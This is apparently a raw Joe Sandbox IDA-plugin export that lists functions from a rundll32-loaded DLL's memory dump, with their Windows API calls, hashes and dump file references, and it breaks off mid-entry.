Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
Instruction ID: 9c0db37145597a9d8002a30536ddf2583a3ab63f37cab70819204e46a6a6359b
Opcode Fuzzy Hash: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
Instruction Fuzzy Hash: 84F09670A40714AEF7206F718D8DF277BA4EBC6B51F01442AE611CB2D0D6B598018F50

Uniqueness

Uniqueness Score: -1.00%

Function 1001820B Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10018224
MapDialogRect.USER32(?,00000000), ref: 100182B5
SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
CLSIDFromString.OLE32(?,?), ref: 100183C6

Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506

CLSIDFromProgID.OLE32(?,?), ref: 100183CE
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
SysFreeString.OLEAUT32(00000000), ref: 100184BA

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
String ID:
API String ID: 2841959276-0
Opcode ID: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
Instruction ID: 12b2beb2c71702a94885f2910fef0e7bfaf155135e6476596dcf7fffba126212
Opcode Fuzzy Hash: c0153d1bb8fcf0a41aaabcf573d8d81effc90bbca259e310eefe5537c03a2762
Instruction Fuzzy Hash: E2B1F075900219AFDB44CFA8C984AEE7BF4FF08344F41812AFC199B251E774EA94CB94

Uniqueness

Uniqueness Score: -1.00%

Function 10029D32 Relevance: 10.6, APIs: 7, Instructions: 128COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10029D39
_memset.LIBCMT ref: 10029DA5

Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1

VariantClear.OLEAUT32(?), ref: 10029DE5
SysFreeString.OLEAUT32(00000000), ref: 10029E66
SysFreeString.OLEAUT32(00000000), ref: 10029E75
SysFreeString.OLEAUT32(00000000), ref: 10029E84
VariantClear.OLEAUT32(00000000), ref: 10029E99

Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C

Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
String ID:
API String ID: 2905758408-0
Opcode ID: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
Instruction ID: f0b41ad0b9e8c5ab018840f5e4220df87c974ebe41012567005bb994ff67d79c
Opcode Fuzzy Hash: 317752fba171eb6017de271287eb17fa51ac427e87f13bc90c3293dac50f3e70
Instruction Fuzzy Hash: 285145B1900209DFDB50CFA4D984BDEBBF8FF08345F604529E516EB292DB74A944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10026AC9 Relevance: 10.6, APIs: 7, Instructions: 121COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10026AD0
VariantClear.OLEAUT32(?), ref: 10026B66
_memset.LIBCMT ref: 10026B9F
_memset.LIBCMT ref: 10026BAB
SysFreeString.OLEAUT32(?), ref: 10026BF0
SysFreeString.OLEAUT32(?), ref: 10026BFA
SysFreeString.OLEAUT32(?), ref: 10026C04

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeString$_memset$ClearH_prolog3Variant
String ID:
API String ID: 3574576181-0
Opcode ID: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
Instruction ID: f024da645e7c2c1b7af1d173f97c0c2408efe7f25a4d8a65d4f7a6d8da03a969
Opcode Fuzzy Hash: 2395c72e51517dafebea27bc0076b2bbc153d5feea7613aa175e303fbf427c27
Instruction Fuzzy Hash: D5414B71901229EFCB12DFA4CC45ADDBBB9FF48750F60811AF059AB151C770AA91CF90

Uniqueness

Uniqueness Score: -1.00%

Function 10016570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 1001658F
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
RegCloseKey.ADVAPI32(?), ref: 1001667C
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E

Strings

Software\, xrefs: 100165E4

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseEnumH_prolog3OpenQueryValue
String ID: Software\
API String ID: 3878845136-964853688
Opcode ID: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
Instruction ID: 033a50cfb30fa6cc3e6a93964c888ed0270874f81604230ed873c3433942879c
Opcode Fuzzy Hash: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
Instruction Fuzzy Hash: EB41BD3590021ADBDF11DBA4CC85AEFB7F9EF49300F10452AF551E7290DB74AA84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001AC0A Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 1001AC38
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
UpdateWindow.USER32 ref: 1001AC79
SendMessageA.USER32 ref: 1001AC9D
SendMessageA.USER32 ref: 1001ACB7
UpdateWindow.USER32 ref: 1001ACFD
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31

Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
Instruction ID: 2c496a546f4f3369c4007c2120619f6f6246382fa3c8875764faf214921a126d
Opcode Fuzzy Hash: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
Instruction Fuzzy Hash: CF419C306047419FD721DF218D84A1BBAE4FFC6B95F00092DF8829A5A1E772D9C4CA92

Uniqueness

Uniqueness Score: -1.00%

Function 100151F8 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 10020D74
SendMessageA.USER32 ref: 10020D8D
GetFocus.USER32 ref: 10020D9F
SendMessageA.USER32 ref: 10020DAB
GetLastActivePopup.USER32(?), ref: 10020DD2
SendMessageA.USER32 ref: 10020DDD
SendMessageA.USER32 ref: 10020E01

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2

Uniqueness

Uniqueness Score: -1.00%

Function 1002A200 Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000002), ref: 1002A21B
GetParent.USER32(?), ref: 1002A22C
GetWindow.USER32(?,00000002), ref: 1002A24F
GetWindow.USER32(?,00000002), ref: 1002A261
GetWindowLongA.USER32(?,000000EC), ref: 1002A270
IsWindowVisible.USER32(?), ref: 1002A28A
GetTopWindow.USER32(?), ref: 1002A2B0

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$LongParentVisible
String ID:
API String ID: 506644340-0
Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750

Uniqueness

Uniqueness Score: -1.00%

Function 10032A89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 10032AB8
__calloc_crt.LIBCMT ref: 10032AC4
CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
__dosmaperr.LIBCMT ref: 10032B2A

Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4

Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C

Strings

V&', xrefs: 10032AFD

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
String ID: V&'
API String ID: 1067611704-802299783
Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10001390 Relevance: 10.6, APIs: 7, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458

Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
String ID:
API String ID: 2004563703-0
Opcode ID: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
Instruction ID: cb42d3b07606be4c321c66a21cc03232491b7df8b22d3b1298026f5f2f4788d5
Opcode Fuzzy Hash: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
Instruction Fuzzy Hash: 1A216DB4904299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00CB65

Uniqueness

Uniqueness Score: -1.00%

Function 10017632 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
RegCloseKey.ADVAPI32(?), ref: 100176AF
RegCloseKey.ADVAPI32(?), ref: 100176B9

Strings

software, xrefs: 10017648

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10001180 Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

~_Task_impl.LIBCPMT ref: 100011B6

Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76

~_Task_impl.LIBCPMT ref: 100011C8
~_Task_impl.LIBCPMT ref: 100011EC

Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB

~_Task_impl.LIBCPMT ref: 100011FE
~_Task_impl.LIBCPMT ref: 10001210
~_Task_impl.LIBCPMT ref: 10001222
~_Task_impl.LIBCPMT ref: 10001231

Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669

Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Task_impl$H_prolog3
String ID:
API String ID: 1204490572-0
Opcode ID: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
Instruction ID: 6e4cb6b4a122521f521244997ac3fe4936e5f385243ec76687bf906466ac38b5
Opcode Fuzzy Hash: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
Instruction Fuzzy Hash: 6B215970905189DBEF09DB98C860BBEBB75EF01308F18469DE0526B3C2CB392B00C716

Uniqueness

Uniqueness Score: -1.00%

Function 10020A8E Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?), ref: 10020A95
__CxxThrowException@8.LIBCMT ref: 10020A9F

Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3

Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1

_memset.LIBCMT ref: 10020AE2
TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10020EEA Relevance: 10.5, APIs: 7, Instructions: 29COMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 10020EF6
GetSysColor.USER32 ref: 10020EFD
GetSysColor.USER32 ref: 10020F04
GetSysColor.USER32 ref: 10020F0B
GetSysColor.USER32 ref: 10020F12
GetSysColorBrush.USER32 ref: 10020F1F
GetSysColorBrush.USER32 ref: 10020F26

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44

Uniqueness

Uniqueness Score: -1.00%

Function 1002981B Relevance: 9.4, APIs: 6, Instructions: 404COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10029837
VariantClear.OLEAUT32(?), ref: 1002989C

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

VariantClear.OLEAUT32(?), ref: 10029AAB
VariantClear.OLEAUT32(?), ref: 10029B1D
VariantClear.OLEAUT32(?), ref: 10029D0E

Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7

Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875

Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
String ID:
API String ID: 63617653-0
Opcode ID: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
Instruction ID: 8f7f5911e4d3fd52506e0ebb541b856e7b36a578254e0be009e80c36fe1d785e
Opcode Fuzzy Hash: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
Instruction Fuzzy Hash: 13F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1002D1E9 Relevance: 9.3, APIs: 6, Instructions: 253stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222

Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0

_memset.LIBCMT ref: 1002D2F2
VariantClear.OLEAUT32(?), ref: 1002D3D1

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
String ID:
API String ID: 4021759052-0
Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
